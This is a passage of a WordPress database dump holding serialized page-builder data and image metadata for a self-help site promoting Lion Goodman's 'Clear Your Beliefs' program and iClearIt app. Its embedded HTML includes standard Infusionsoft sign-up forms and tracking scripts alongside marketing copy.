/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1366, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1505:"<p>[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -30px; margin-top: 15px;"><br /> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><p><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><br /> <input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><br /> <input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2157:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" style="position: relative; top: 10px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" style="position: relative; bottom: -2px ! important;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div><p> </p></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1208:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br><br><br><br>\n\n<form class="infusion-form rd-form-1" style="position: relative; " accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1219, 1694, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:882:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1221, 1696, '_wp_attached_file', '2014/10/iClear-new-FINAL-large-app-box.jpg'),
(1222, 1696, '_wp_attachment_metadata', 'a:4:{s:5:"width";i:1824;s:6:"height";i:1816;s:4:"file";s:42:"2014/10/iClear-new-FINAL-large-app-box.jpg";s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:16:"iCreate new copy";}}'),
(1223, 1697, '_wp_attached_file', '2014/10/iClear-200x201-app-box.jpg'),
(1224, 1697, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:202;s:6:"height";i:201;s:4:"file";s:34:"2014/10/iClear-200x201-app-box.jpg";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"iClear-200x201-app-box-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:34:"iClear-200x201-app-box-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1225, 1698, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:588:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> 